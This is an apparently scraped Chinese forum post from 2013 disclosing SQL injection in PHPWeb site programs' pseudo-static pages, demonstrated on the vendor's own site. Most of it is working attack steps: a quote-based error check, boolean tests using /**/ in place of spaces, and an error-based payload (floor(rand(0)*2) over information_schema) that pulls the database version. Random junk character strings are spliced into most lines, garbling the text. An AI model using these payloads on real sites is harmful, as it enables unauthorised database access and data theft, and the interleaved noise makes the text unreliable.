phpweb所有的整站程序伪静态页面都存在sql注入
3 o5 }8 P9 X5 \( E# q
1 W' E6 b; h3 E$ c. B) r主站:http://phpweb.net/+ {- U) T6 ^: P3 ?7 c8 ]& Y7 _
加’检测:0 b9 q" ]6 y, s- d; ~" y |
+ ^3 A3 l% T* H" E) E4 a5 j0 C2 O" r
http://www.phpweb.net/down/html/?772′.html4 L( H+ g( d$ o0 x4 l
/ X) i8 O2 u" \! R) A) m- K
出错, m: h2 Z' F' ^$ K( `7 R O! O, e
存在注入。5 Y% |- V# b% |$ Q- I& ?
不能用空格,只能用/*罗& V- b; B' m- H
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
/ s; s1 Q' ^2 N! {* ?6 `* j4 o 2 Z+ y: l2 t# l6 b
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.; J5 X b5 ~' r* z9 t# c
爆数据库版本:( b8 {. z L. A) |2 ^
+ y" M( S) e& V8 t. L( M% V( p; X3 S?
6 q+ J3 s) Q" S# l, N1
5 a3 @. U# k3 [! o3 m5 ]& Thttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html8 f- P0 p: \3 Z" {
更新日期: 2013-01-03 13:39:50
3 o% [1 X8 x! E3 V; \3 X( U |
发表于 2013-1-4 19:46:42
收藏
支持
反对